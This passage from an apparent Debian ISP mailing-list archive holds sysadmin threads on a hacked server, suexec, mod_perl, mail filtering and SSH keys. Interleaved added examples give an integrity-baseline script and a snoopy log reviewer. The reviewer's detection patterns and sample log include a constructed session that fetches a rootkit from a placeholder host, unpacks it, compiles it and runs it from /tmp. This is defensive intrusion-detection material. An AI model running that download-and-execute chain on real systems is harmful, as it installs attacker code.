> the hacker can login again and gain root easily)?
>
>
> Hope you can shed some light on the above, so at least the system can get
> back up and running, then we can even setup a new server (with SE Linux
> and various others) and migrate the accounts over.
>
> Thanks in advance!!!
>
> Sincerely,
> Jason
>
> - Original Message -
> From: "Russell Coker" <[EMAIL PROTECTED]>
> To: "Jason Lim" <[EMAIL PROTECTED]>; 
> Sent: 29 June, 2003 4:02 PM
> Subject: Re: Server hacked - next...?
>
>
> > On Sun, 29 Jun 2003 17:12, Jason Lim wrote:
> > > The box is a very recently updated "stable" box... virtually every
> other
> > > date apt-get is update/upgrade.
> > >
> > > The box is setup very secure... the usual things were done... like
> > > ensuring no unused services are running and things like that.
> > >
> > > So does that mean "stable" is actually vulnerable to something we all
> > > don't know about???
> >
> > That could be the case.
> >
> > Or it could be some issue of your configuration.  Maybe you have Apache
> set to
> > run customer cgi-bin scripts under the same UID and a customer uploaded
> an
> > insecure or hostile cgi-bin script.
> >
> > Have you considered using SE Linux?
> >
> > --
> > http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux
> packages
> > http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
> > http://www.coker.com.au/postal/Postal SMTP/POP benchmark
> > http://www.coker.com.au/~russell/  My home page
> >
> >
>
>
>
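The two IDS threads above ask which file-integrity checker to use, and the "Server hacked" question asks whether files can be verified against a known-good state and how to find set-uid files an intruder left behind. As an added example, not code from any of the posts or from aide, tripwire or chkrootkit, here is the minimum those tools do, in sh: a hash baseline, a set-id inventory, and a comparison. It assumes POSIX sh, find, sort, comm and coreutils sha256sum.

```sh
#!/bin/sh
# Added example, not from the thread: a minimal host baseline of the kind
# aide/tripwire/integrit keep, plus the set-uid inventory asked about above.
# Take the baseline right after install and store it OFF the box (or on
# read-only media): a root-level intruder can otherwise just regenerate it.
# On a suspect host run these from known-good binaries (a boot CD), because
# a rootkit may have replaced find, ls and sha256sum themselves.
export LC_ALL=C    # one collation for sort and comm

# baseline_hashes ROOT
# "<sha256>  <path>" for every regular file under ROOT on one filesystem,
# sorted so two baselines can be compared with comm(1).
baseline_hashes() {
    find "$1" -xdev -type f -exec sha256sum {} + | sort
}

# list_setid ROOT
# Set-uid / set-gid regular files under ROOT, sorted.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# diff_listing SAVED CURRENT
# Lines only in SAVED print with "-", lines only in CURRENT with "+"; a
# changed file therefore shows as one "-" and one "+" line. Exit 1 on any
# difference, 0 when the two listings are identical.
diff_listing() {
    comm -3 "$1" "$2" | awk -F'\t' '$1 != "" {print "-" $1} $1 == "" {print "+" $2}'
    [ "$(comm -3 "$1" "$2" | grep -c .)" -eq 0 ]
}

# check_host ROOT SAVED_HASHES SAVED_SETID
# Rebuild both listings for ROOT and compare them with the saved copies.
check_host() {
    cur_h=$(mktemp) cur_s=$(mktemp)
    baseline_hashes "$1" > "$cur_h"
    list_setid "$1" > "$cur_s"
    rc=0
    diff_listing "$2" "$cur_h" || rc=1
    diff_listing "$3" "$cur_s" || rc=1
    rm -f "$cur_h" "$cur_s"
    return "$rc"
}

# Typical use:  baseline_hashes / > /mnt/usb/hashes; list_setid / > /mnt/usb/setid
# later:        check_host / /mnt/usb/hashes /mnt/usb/setid
```

Two points the posts circle around. First, mtime is deliberately not part of the fingerprint: `touch -r` resets it in one command, while a content hash plus the set-id bits catch the classic case of a trojaned binary padded to the original size. Second, for packaged files Debian already ships a baseline: the md5sums dpkg keeps under /var/lib/dpkg/info/ can be checked with `debsums -c`, which answers the "does dpkg have this ability" question; but those md5sums files live on the same disk an intruder owns, so a clean debsums run is weak evidence on a box that was rooted, and reinstalling from known media is what actually restores trust.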





Re: Anyone running Exim 3.3x + Mysql Virtual users?

2003-07-01 Thread Dan MacNeil

I had a similar experience, decided to look at postfix and then never
looked back.


On Mon, 30 Jun 2003, Dustin Douglas wrote:

> I've got the chance to set up a brand new email server for one of our
> clients, and being the forward thinking sysadmin that I am, I don't
> want to go with the old standby Sendmail, I've got 2 of the beasts
> already, and don't want another.
>
> I've been looking at Exim in Debian Stable and it looks pretty good,
> but I'm getting bogged down trying to get everything configured
> properly, and I want to give Exim a fair shot. I don't want to give up
> on it just because I'm missing something.
>
> So, anyone have any good pointers to cookbook/HOWTO type docs about
> setting up Mysql& Exim with an eye towards virtual users? I've seen
> some guides for Exim 4.1x, but Stable uses the older 3.3x line, and
> I'd very much like to keep the install as stock as possible.
>
> Thanks for any pointers...
>
> Have a good one.
>
>




Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

>Does anyone know what the default document
>root is for the Debian configuration of suexec?

/var/www/

To change the document root of suexec you need to recompile suexec see:

http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt

###
On Wed, 2 Jul 2003, Anand Atreya wrote:

> Hi,
>
> I have just recently begun using Debian and am in the process of
> migrating a FreeBSD 4.4 server over to it.  This server had many different
> users and allowed them to execute CGI and PHP scripts in their public_html
> folder (or any folder under it) as their own user, not as the user of the
> webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven Haryanto).  The
> site where this was located
> (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, and
> in hindsight, it seems as if mod_cgiwrap was not a very secure solution to
> begin with.
> Does anybody have any recommendations on how to set up a virtual hosting
> Apache server such that users can have CGI and PHP scripts execute as
> themselves, without having to put #!/usr/bin/php at the top of php scripts,
> and that is completely transparent to the user, also allowing them to place
> scripts anywhere in their document root?
> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not using
> the www.domain.com/~username address, it did not execute the script, saying
> it was not in the document root.  Does anyone know what the default document
> root is for the Debian configuration of suexec?)
>
> Thanks a lot.
> -- Anand Atreya
>
>
>




Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

> If only this could be in a configuration file..

What is worse is that every time there is a security patch for apache, we
break our hand compiled suexec

On Thu, 3 Jul 2003, Jason Lim wrote:

>
>
> >
> > >Does anyone know what the default document
> > >root is for the Debian configuration of suexec?
> >
> > /var/www/
> >
> > To change the document root of suexec you need to recompile suexec see:
> >
> > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt
>
>
> If only this could be in a configuration file..
>
>
>




Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

We use the shbang...

On Wed, 2 Jul 2003, Anand Atreya wrote:

> Any recommendations on how to do this with PHP - without needing the
> #!/usr/bin/php at the top and without using PHP Safe mode - which is a lame
> workaround...?
>
> -- Anand
>
> - Original Message -
> From: "Dan MacNeil" <[EMAIL PROTECTED]>
> To: "Jason Lim" <[EMAIL PROTECTED]>
> Cc: "Anand Atreya" <[EMAIL PROTECTED]>; 
> Sent: Wednesday, July 02, 2003 9:33 PM
> Subject: Re: Wrapping CGI and PHP Scripts
>
>
> >
> > > If only this could be in a configuration file..
> >
> > What is worse is that every time there is a security patch for apache, we
> > break our hand compiled suexec
> >
> >
>




Re: mod_perl and mod_asp

2003-07-11 Thread Dan MacNeil

One reason to avoid mod_perl is memory consumption. CGI scripts take up
memory only when they are running. --You can have hundreds of CGI scripts
on your server.  When we moved to mod_perl our apache processes moved from
taking about 3M each to about 8M each. With 100 processes this might be
an issue for you.

On the other hand if you are running a cgi script more than twice a
second, mod_perl is a big win.

To answer your question, putting SSL & mod_perl on the same server
works fine for us. You might think of separate servers for CGI and
mod_perl though.


On Fri, 11 Jul 2003, Rod Rodolico wrote:

> Ok, this is likely a major stupid question.
>
> I need mod_asp for my apache 1.3 server. I installed mod_perl and mod_asp
> via dselect on my development server, but see no configuration changed in
> httpd.conf. I see no sign that mod_perl or mod_asp were installed, and
> have discovered no way to see what modules are loaded by an instance of
> apache.
>
> Is mod_perl loaded via some kind of pfm? I have rtfm'd, but haven't seen
> anything on the mod_perl v1 being loaded as a module.
>
> I basically have no clue what is going on here. Is it loaded? Is there a
> way to verify it? Or, do I need to add a LoadModule mod_perl entry. I
> tried that, but mod_perl was not found in mod_perl.so
>
> Finally, is there any reason I should not build a mod_perl & mod_ssl
> version of apache? I use ssl on some of my sites, and I write a lot of
> perl cgi scripts. Currently, my production server has an apache-ssl and a
> standard apache server running (two servers), and I need the ability to
> run perl on both. I'm thinking I should have only one server, with the
> ability to run ssl and perl. Suggestions?
>
> Thanks
>
> Rod
>
>





command logging

2003-10-28 Thread Dan MacNeil

For a box that will have limited shell access, I'm looking for something
that will log all commands. The sudo log is nice but not everything is run
through sudo.

There won't be many privacy issues as most users won't have shell.

The goal is to review a daily report for anything unexpected: stuff like:

tar -xzf rootkit.tar.gz







tracking down i/o sucking process

2003-11-03 Thread Dan MacNeil

I'm sure this info is googlable but after 30 minutes I can't find it...

I can hear the discs on the server going wild, I run:

sar -d 2 120

...and disc utilization is indeed higher than normal. How do I find what
process is driving up the i/o load?

the command:

top

..is great for CPU & RAM but doesn't do disc...




apt-get bcm5700-module-2.4.18

2003-11-20 Thread Dan MacNeil

Two questions:

1) Has anyone done a:

apt-get install bcm5700-module-2.4.18

...with a stock 2.4.18 kernel or otherwise used this driver from without
the package system.

I would very much like to avoid custom compiling kernels so I can fix any
future kernel security holes with apt-get update/upgrade -s/upgrade ?

2) Has anyone gotten different apt-cache search results using the same
sources.list on different machines?

On machine (A) the broadcom package above shows up, On machine B it
does not.

sources.list below:

# See sources.list(5) for more information
deb http://debian.lcs.mit.edu/debian woody main contrib non-free
deb http://http.us.debian.org/debian woody main
deb http://security.debian.org/ woody/updates main contrib non-free
deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free
# deb http://tiefighter.et.tudelft.nl/~arthur/cvsd ./

# deb-src http://http.us.debian.org/debian testing main contrib non-free
deb-src http://debian.lcs.mit.edu/debian woody main contrib non-free
deb-src http://http.us.debian.org/debian woody main contrib non-free
deb-src http://security.debian.org/ woody/updates main contrib non-free
deb-src http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free





Re: Multiple Server routet to one location

2003-12-14 Thread Dan MacNeil

All this assumes that you need to ration your dialup time. If not use
something like freesco.org to make the connection on demand and use
regular smtp/ftp/http etc to allow people remote access to your Strasbourg
server(s)

> ...and if I collect the Mail in Strasbourg, how can I send it effectively
> to Problem-POP's ?

uucp is the program/protocol designed to deliver mail over intermittent
connections.

I believe that from the mid 80s to the mid 90s, a lot of US email traveled
over uucp over intermittent dialup lines instead of over smtp over
dedicated connections

A quick:

 apt-cache search uucp

I did some quick googling...

Below is a link to a Sendmail/uucp doc:

http://www.fifi.org/doc/HOWTO/en-html/mini/Sendmail+UUCP.html

I know you are running courier as your smtp server, but it might help get
some general principles established. Getting this to and from port 25 or
/var/spool/mail might be the same.

As to allowing the remote sites to publish web pages, from experience in
rural southeast USA 11 years ago, I'd guess that most people on the short
end of an intermittent dial-up connection are most interested in email. Once
that is working smoothly, I'd worry about other stuff.

The minority that need/want to publish web pages on the full time
Internet might get by with emailing them to the hub for a little
while.

Hope this helps.



On Sun, 14 Dec 2003, Michelle Konzack wrote:

> Hello,
>
> I have a small problem with the planning of my CyberCenter:
>
> In Strasbourg I have a Virtual-Webserver with the 'www' Host and the
> 'strasbourg' Host. The internet connectivity is quite well...
>
> This Server is in the same time the Router/Firewall and has 3 NIC's.
> (external interface, admin-net and public-net with all the Workstations)
>
> Internal I have a nfs-Server where my Clients have a little Diskspace
> (50 MByte) for Web (~/public_html) and Mail (~/Maildir). The Server is
> running courier-(imap,mta) and apache.
>
> Then I have in different villes/countries POP's (other CyberCenters)
> which have its own nfs-Servers.
>
> So I have following public:
>
> www.ccenter.org          Main Web-Server
> strasbourg.ccenter.org   nfs/apache/courier-Server where clients have:
>                          E-Mail: [EMAIL PROTECTED]
>                          Web:    strasbourg.ccenter.org/~client/
> utopia.ccenter.org       same as 'strasbourg'
>
> Now the Problem:
>
> The internet connectivity is in some locations only V.90 or ISDN, so
> Web/Mail-Services are not possible permanently.
>
> Solution:
>
> All Web/Mail-Activity is routed via Strasbourg...
>
> OK, I can poll the Problem-POP's through a squid-cache using wget...
>
> But HOW ?
>
> ...and if I collect the Mail in Strasbourg, how can I send it effectively
> to Problem-POP's ?
>
> I was thinking on collecting Mails and put it onto a shttp-cgi, which
> tar it up after a wget-request (e.g. all 30 minutes). Then on the
> Problem-POP it will be decompressed and all Messages forwarded to procmail...
>
> Any suggestions ?
>
>
> Thanks
> Michelle
>
> P.S.: The Location is Ercec (Turkey) and Khoy (Iran) and there is
>   nothing !
>
>






Re: Best Practices: CGI.pm & CSS2 ???

2003-12-31 Thread Dan MacNeil

CSS is not deprecated. It is not reliable for positioning but it is quite
usable for defining text and character styles. If you have ever
changed all the font tags in a web site, you will be a CSS fan.

If you attempt to validate your HTML against w3.org's validator, you
are required to be a fan.

http://validator.w3.org/

It is probably not a good idea to use CGI.pm to produce HTML output. Why
learn another HTML syntax? Something like HTML::Template or even a HERE
document will serve you better.

However it is very foolish to **Not** use CGI to parse input from a form.
It is much, much easier and safer than parsing the raw query string or
reading STDIN or escaping shell characters or otherwise doing the job by
hand.

#!/usr/bin/perl -wT
use strict;
use CGI;
use CGI::Carp;          # die()/warn() output goes to the server error log
my $q = new CGI;
# CGI.pm decodes the query string / POST body for us
my $name = $q->param('first_name') || 0;
# never echo raw input back into the page: a name containing '<' or '"'
# would otherwise be interpreted as markup by the browser
my $safe_name = $q->escapeHTML($name);

# the result page needs its own Content-Type header, just like the form
my $result = $q->header(-type => 'text/html', -charset => 'ISO-8859-1') . <<"HERE";
<html>
<head><title>Hello $safe_name</title></head>
<body>
<h1>hello $safe_name</h1>
</body>
</html>
HERE

if ($name) {
    print $result;
}
else {
    # no name submitted yet: emit the form stored after __DATA__
    # (its Content-Type line and the blank line after it are part of the data)
    print <DATA>;
}

# see perldoc perldata for __DATA__ file handle info
__DATA__
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>simple form</title>
</head>
<body>
<form method="get" action="">
<p>
Name: <input type="text" name="first_name" />
<input type="submit" value="go" />
</p>
</form>
</body>
</html>

#

On Tue, 30 Dec 2003, Chris Wagner wrote:

> I can tell you some stuff about that right now.  CGI.pm is just a quick and
> dirty module that will save on some typing in your perl script.  Emphasis on
> some.  If you're doing anything more than basic html tags it quickly becomes
> not worth it anymore.  Writing tag attributes takes up more time and space
> than just writing out the html itself.  The one thing it's really good for
> is writing out tables.  If you have an array with all your row data you can
> write something like print Tr( td([EMAIL PROTECTED]) ).  That saves a lot of 
> typing.
> The perldoc has most of the gritty details.
>
> Cascading Style Sheets.  Deprecated.  I have seen so many bad uses of style
> sheets it makes me want to cry out in anger.  So just don't use them unless
> there's no other way to do it.  They are almost guaranteed to cause
> compatibility problems.  The problem is that some bonehead writes a style
> sheet that makes a webpage look good on *their* computer.  To hell with
> everybody else who doesn't have the same monitor, resolution, fonts,
> browser, etc.  The one thing they are "good" for is making themes but be
> careful that it's still legible on other machines.  I have them turned off
> in my browser.
>
>
> At 10:50 PM 12/29/03 -0600, Michael D Schleif wrote:
> >Please, somebody point me to URL's that provide examples and best
> >practices of using CSS2, CGI.pm and XHTML v1.x.
> >
> >--
> >Best Regards,
>
>
>
>
>
> --
> REMEMBER THE WORLD TRADE CENTER ---=< WTC 911 >=--
> "...ne cede males"
>
> 0100
>
>
>








replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil

Right now we use sanitizer (stable package) to call a virus scanner and to
strip script,img, style, etc tags

We're thinking of switching to amavisd-new (unstable) and clamav (testing)
because while sanitizer strips out the virus, it still passes the junk
message through. We'd like to be able to drop virus infected messages to
the floor. Another (very minor) consideration is that sanitizer is not a
daemon and pays a speed penalty every time it is launched.

The problem I see looking at the docs is that amavisd-new doesn't strip
out potentially evil html.

The direction, we're drifting is to run sanitizer after amavisd-new. (I
think postfix can run filters in sequence)




Re: replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil


Thanks for your discussion.

One correction, the muttering about "unsupported methods" is actually
from:

http://www.postfix.org/addon.html#content

which is perhaps slightly more creditable than geocities.

Googling around a bit I got this thread with thoughts from one of
the main developers (Wietse Venema)

http://archives.neohapsis.com/archives/postfix/2003-08/0511.html
http://archives.neohapsis.com/archives/postfix/2003-08/0513.html
http://archives.neohapsis.com/archives/postfix/2003-08/0514.html
http://archives.neohapsis.com/archives/postfix/2003-08/0515.html
http://archives.neohapsis.com/archives/postfix/2003-08/0522.html
http://archives.neohapsis.com/archives/postfix/2003-08/0595.html

[the threading at the archive was not good so I included links to whole
thread]

I might feel differently if our server was heavily burdened, but the
prospect of breaking things with an upgrade to postfix is not worth the
speed.

On Sat, 10 Jan 2004, Michael Loftis wrote:

>
>
> --On Saturday, January 10, 2004 21:53 -0500 Dan MacNeil
> <[EMAIL PROTECTED]> wrote:
>
> >
> > Thanks for your reply.
> >
> >> Might I suggest MailScanner?
> >
> > You might, some specific problems with amavisd-new that aren't present in
> > MailScanner  might be even more helpful.
> >
> > At:
> >  http://www.geocities.com/scottlhenderson/spamfilter.html
> >
> > they say:
> >
> ># mailscanner system, works with Postfix and other MTAs. This
> > uses unsupported methods to manipulate Postfix queue files, and there are
> > multiple reports of message duplication and/or delivery of truncated
> > messages.
>
> It isn't exactly supported nor unsupported. Basically it relies on the
> fact that postfix can be told to use deferred transports on inbound,
> automatically forcing everything to go into the deferred queue.  You run
> one copy of postfix in that mode.  Another in a normal mode, minus
> smtp/incoming mail.  I haven't had any problems with truncated email nor
> duplicate deliveries at all with recent-ish Postfix.  MailScanner monitors
> the deferred queue, pulling messages out of there and working on them,
> putting them into the inbound pickup area on the other postfix instance
> after processing.  The system works well and is quick.
>
> I don't see how postfix could be responsible for multiple deliveries in
> this scenario, nor how mailscanner would cause it.  The only time that sort
> of thing would happen is for people who don't follow the instructions and
> don't put the three queues (mailscanner, inbound postfix, outbound postfix)
> on the same partition/filesystem.  This is a MUST.  mailscanner simply
> relinks the files into/out of work areas, this is fast, and atomic,
> assuming it's on the same filesystem.  Otherwise if it's not the same
> filesystem you have to copy to/from staging areas to achieve the atomicity.
>
>
> MailScanner catches about 30% more 'dangerous content' and virii than
> amavisd-new given the same virus scanner because MS seems to unpack more
> thoroughly/properly.  MS supports/integrates the update system of all the
> virus scanners it supports negating the need to run a separate update
> cronjob all the time.  MS supports throttles, amavisd does not, and so MS
> will be much nicer to an overloaded/very briskly loaded system than
> amavisd.  amavisd requires copying the message multiple times, MS reduces
> this by using the link/unlink method that all mailservers use nowadays
> internally to their queues.
>
> MS does require running two separate copies of postfix, that amavisd does
> not.  There's a point for amavis.  amavis eliminates unnecessary code from
> the resultant script at ./configure time, MailScanner doesn't.  That said
> though MailScanner seems to work faster on my system.
>
> Not sure how much else to go on about this.
>
> --
> Michael Loftis
> Modwest Sr. Systems Administrator
> Powerful, Affordable Web Hosting
>




Re: replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil

Thanks for your reply.

> Might I suggest MailScanner?

You might, some specific problems with amavisd-new that aren't present in
MailScanner  might be even more helpful.

At:
 http://www.geocities.com/scottlhenderson/spamfilter.html

they say:

# mailscanner system, works with Postfix and other MTAs. This
uses unsupported methods to manipulate Postfix queue files, and there are
multiple reports of message duplication and/or delivery of truncated
messages.

#

On Sat, 10 Jan 2004, Michael Loftis wrote:

> Might I suggest MailScanner?  For me it's been MUCH more reliable and
> flexible.  In fact I'm gearing up to replace amavisd-new with MailScanner
> at work.  We've run into some bugs with the latest version (4.24
> specifically), but the version I'm using on FreeBSD 4.22.5 is solid, and
> the version in debian stable 3.13.2 should also be very solid.
>
> It works with a slew of AV scanners, and integrating with one it doesn't
> support natively is simple as editing a few files.  The thing has about
> 1000 some odd settings though so it can be daunting to set up.
>
>
>
>
> --
> Michael Loftis
> Modwest Sr. Systems Administrator
> Powerful, Affordable Web Hosting
>
>
>




Re: SSH Privat key and login as root without a passwort

2004-01-18 Thread Dan MacNeil

> I am looking to generate a private SSH key. There is a tool that generates
> private RSA keys. Now I have a private key generated, but where must I put
> it in Linux so that Linux knows who I am and I don't need a password for
> login.


You put the **private** key on the system you are connecting FROM, (in
your case this looks like Putty) and you put the **public** key on the
system you are connecting TO. (in your case this looks like in
~/.ssh/authorized_keys)

The docs for putty, ssh, ssh-keygen should be helpful:

http://www.tartarus.org/~simon/puttydoc/Contents.html

man ssh-keygen
man sshd # see end for authorized_keys file info

It is worth noting that putty can import/export
openssh keys.

Also you should check that the system administrator has not disallowed use
of public/private keys for ssh authentication. (see /etc/ssh/sshd_config
on the system you are connecting TO)



On Sun, 18 Jan 2004, Fraser Campbell wrote:

> On January 18, 2004 10:45 am, ournewsletter wrote:
>
> > put it in /root/.ssh/authorized_keys. I don't know if it works with the key
> > produced by Putty, but with a "ssh-keygen"-generated public key it does. If
> > you need more public keys to log in, simply name the key
> > files /root/.ssh/authorized_keys2, /root/.ssh/authorized_keys3 ...
>
> Putty keys do work with openssh but you must edit them first.  Putty keys
> look rather like the ascii export of a gpg key, you must edit them so that
> they look like this:
>
> ssh-rsa 89yh23wrnhjfdg... #all one line
>
>





Re: apt-get and mounting /tmp with noexec option

2004-01-18 Thread Dan MacNeil

How about running apache chroot'd so what apache thinks is /tmp and
what apt-get thinks is /tmp are two different things?

fstab would look something like: (untested)

#
/dev/sdc1 /var/www/tmp/ noexec, blah,blah,blah




shell access exploits (was Re: upgrading to MySQL 4 on woody)

2004-01-20 Thread Dan MacNeil

> I have at most a week from a known kernel exploit to when one of my users
> tries to exploit via shell access.

One of my hats is a junior sys admin in an academic environment. I'm
curious as to how you know when shell users are trying to exploit a kernel
hole.

In another non academic environment and based on info from this list, I've
been running snoopy with an eye to grepping the logs for naughtiness


#

On Mon, 19 Jan 2004, Lucas Albers wrote:

>
> Rod Rodolico said:
>
> > Becoming a firm believer that you CAN have it all, stability and the
> > latest packages :)
> >
> > There are other places to get backports, BTW. This one works for me.
> >
> Rod,
> Yes I agree with your statements.
> Thanks for the link I'll use it on one of my systems...
>
> But you don't explicitly have security, you have the testing delay for
> security updates, combined with the propagation time to backports from
> testing.
>
> I'm still leery of using testing for any publicly exposed service, or for
> machines with shell access.
> I have at most a week from a known kernel exploit to when one of my users
> tries to exploit via shell access.
>
> --Luke CS Sysadmin, Montana State University-Bozeman
>
>
>
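For the daily "anything unexpected" report asked about in the command logging post above (the `tar -xzf rootkit.tar.gz` case) and the snoopy-based grepping mentioned here, an added example, not code from the list posts: it parses snoopy's syslog lines and groups the commands that trip a watch list by login session. The line format is assumed to be snoopy's default `[uid:N sid:N tty:T cwd:D filename:F]: argv`, the watch list is hypothetical, and the sample log lines are constructed.

```python
"""Review a day of snoopy command logs for anything unexpected.

Added example, not from the list posts. Assumes snoopy's syslog line format
(<mon> <day> <hh:mm:ss> <host> snoopy[<pid>]: [uid:N sid:N tty:T cwd:D filename:F]: <argv>)
and a hypothetical watch list; the sample log lines below are constructed.
"""
import re
from collections import defaultdict

SNOOPY_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"snoopy\[(?P<pid>\d+)\]: \[uid:(?P<uid>\d+) sid:(?P<sid>\d+) "
    r"tty:(?P<tty>\S+) cwd:(?P<cwd>\S+) filename:(?P<filename>[^\]]+)\]: "
    r"(?P<argv>.*)$"
)

# Hypothetical watch list for a limited-shell box. A human reads the report,
# so rules are deliberately broad and cheap rather than verdicts.
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl", "ftp", "lftp", "ncftp"}
COMPILERS = {"gcc", "cc", "g++", "c++", "make"}
UNPACKERS = {"unzip", "gunzip", "bunzip2"}
KEYWORDS = re.compile(r"rootkit|exploit|sploit", re.IGNORECASE)
TAR_EXTRACT = re.compile(r"^tar\s+(?:-?[A-Za-z]*x[A-Za-z]*|--extract)\b")

def parse_line(line):
    """Dict of snoopy fields, or None when the line is not snoopy output."""
    m = SNOOPY_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    for key in ("pid", "uid", "sid"):
        entry[key] = int(entry[key])
    return entry

def rules_for(entry):
    """Names of every watch-list rule a parsed entry trips (empty = nothing)."""
    hits = []
    base = entry["filename"].rsplit("/", 1)[-1]
    argv = entry["argv"]
    if entry["uid"] == 0:
        hits.append("root-command")      # everything root runs goes in the report
    if base in DOWNLOADERS:
        hits.append("download")
    if TAR_EXTRACT.match(argv) or base in UNPACKERS:
        hits.append("archive-extract")
    if base in COMPILERS:
        hits.append("compile")
    if entry["filename"].startswith(TMP_DIRS):
        hits.append("exec-from-tmp")     # binary run out of a scratch directory
    if KEYWORDS.search(argv):
        hits.append("keyword")
    return hits

def review(lines):
    """Run the watch list over raw log lines.

    Returns (findings, unparsed): one finding dict per (entry, rule) pair in
    log order, plus a count of non-empty lines that did not match the snoopy
    format, which the report mentions rather than silently dropping.
    """
    findings, unparsed = [], 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            if line.strip():
                unparsed += 1
            continue
        for rule in rules_for(entry):
            findings.append({"rule": rule, "ts": entry["ts"], "uid": entry["uid"],
                             "sid": entry["sid"], "argv": entry["argv"]})
    return findings, unparsed

def sessions(findings):
    """Group findings by login session (sid) so a download -> unpack ->
    compile -> run chain reads as one story instead of four stray lines."""
    by_sid = defaultdict(list)
    for f in findings:
        by_sid[f["sid"]].append(f)
    return dict(by_sid)

def format_report(lines):
    """Plain-text daily report, suitable for mailing to the admin."""
    findings, unparsed = review(lines)
    out = ["%d finding(s), %d unparsed line(s)" % (len(findings), unparsed)]
    for sid, fs in sorted(sessions(findings).items()):
        out.append("session %d (uid %d):" % (sid, fs[0]["uid"]))
        out.extend("  %s  %-16s %s" % (f["ts"], f["rule"], f["argv"]) for f in fs)
    return "\n".join(out)

# Constructed sample: a harmless session, a session that fetches, unpacks,
# builds and runs something out of /tmp, one root command, one non-snoopy line.
SAMPLE_LOG = """\
Nov  3 09:12:01 shell1 snoopy[2210]: [uid:1001 sid:2200 tty:/dev/pts/0 cwd:/home/alice filename:/bin/ls]: ls -la
Nov  3 09:12:07 shell1 snoopy[2214]: [uid:1001 sid:2200 tty:/dev/pts/0 cwd:/home/alice filename:/usr/bin/vim]: vim report.txt
Nov  3 09:20:44 shell1 snoopy[2301]: [uid:1002 sid:2290 tty:/dev/pts/1 cwd:/tmp filename:/usr/bin/wget]: wget http://example.invalid/rootkit.tar.gz
Nov  3 09:20:59 shell1 snoopy[2305]: [uid:1002 sid:2290 tty:/dev/pts/1 cwd:/tmp filename:/bin/tar]: tar -xzf rootkit.tar.gz
Nov  3 09:21:30 shell1 snoopy[2310]: [uid:1002 sid:2290 tty:/dev/pts/1 cwd:/tmp/rk filename:/usr/bin/gcc]: gcc -o x x.c
Nov  3 09:21:45 shell1 snoopy[2312]: [uid:1002 sid:2290 tty:/dev/pts/1 cwd:/tmp/rk filename:/tmp/rk/x]: ./x
Nov  3 10:02:11 shell1 snoopy[2400]: [uid:0 sid:2390 tty:/dev/pts/2 cwd:/root filename:/usr/bin/apt-get]: apt-get upgrade -s
kernel: eth0: link up
"""

if __name__ == "__main__":
    print(format_report(SAMPLE_LOG.splitlines()))
```

Feed it yesterday's syslog slice from cron and mail the output; the unparsed count is the check that the log format (or the syslog filter) has not drifted.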




changing max privledged port from 1024

2004-02-02 Thread Dan MacNeil

How do you allow non root users to bind to ports below 1024 ?

Alternatively, what iptables / tcpwrappers / xinetd / stunnel / magic
thing should I be looking at to forward port 995 to port 5432 ?

Our bandwidth provider (A university telecom dept) is filtering port 5432,
the postgres port. On the political front things are proceeding
slowly.

We'd like to bind postgres to port 995 (/etc/services says: pop3
over SSL) as this port is unlikely to be closed and we're not
running pop3 over SSL on the database machine.

Postgresql does not run as root and hence cannot bind to port 995

A morning of google and man sysctl have given teases but no answers.




Re: Still Considering Debian - But Stuck!

2004-02-02 Thread Dan MacNeil

I don't have a footnote, but I believe a recent linux journal article says
that the 2.6 kernel uses a posix threads library which are much nicer than
linux threads and that redhat has backported this support to RH9 and the
2.4 kernel.

It should be possible to DL the redhat 2.4 patches


On Mon, 2 Feb 2004, Dr. G Wu wrote:

> RH9 support NTPL, which might explain your problem.
> could you also have a look at this post.
> http://forums.gentoo.org/viewtopic.php?t=38138
> It is a hot discussion about why Java is slower on Linux than on
> Windows, slower on Gentoo than on RH9, whether NTPL would help boost
> the performance.
> regards,
> Ben
>
>
> On Monday 02 February 2004 6:24 pm, Fred Whipple wrote:
> > Hi Everyone,
> >
> > A while back I asked for some feedback and got a very rich set of
> > info from folks about Debian used in a stable ISP environment as
> > compared to other OS's and distributions.  All the info was very
> > helpful and helped us further solidify our desire (though not yet
> > decision) to make Debian our platform as we move forward.
> >
> > We've run into a couple rather HUGE issues, though, that I'd like
> > to get further feedback on.  Not that I couldn't figure it all out
> > for myself, but nothing beats someone else's experience when it
> > comes to saving me the time and heartache ;-)  Just about everyone
> > warned me that the stable Debian distribution would be old and well
> > tested/maintained, but I'm not sure I was prepared for just HOW
> > old...
> >
> > Our company uses Java --- a LOT of Java.  We therefore use a lot of
> > threads, and a lot of threads.  And a whole mess of threads, too.
> > Under Red Hat 7.3, we found that when the system had a total of
> > say, 10,000 PID's given out (nearly all of them to threads) the
> > system would become very unstable.  When we moved to Red Hat 9 for
> > the affected systems, which includes the new O(1) scheduler, and
> > either a different kind of thread support in either the kernel or
> > GlibC, this problem went away. I'm honestly not sure who is
> > responsible for the way threads are handled, and I suspect it's not
> > exclusively the kernel, but under RH9 each JVM (or any app with
> > threads) gets a single PID as normal and all very strange behavior
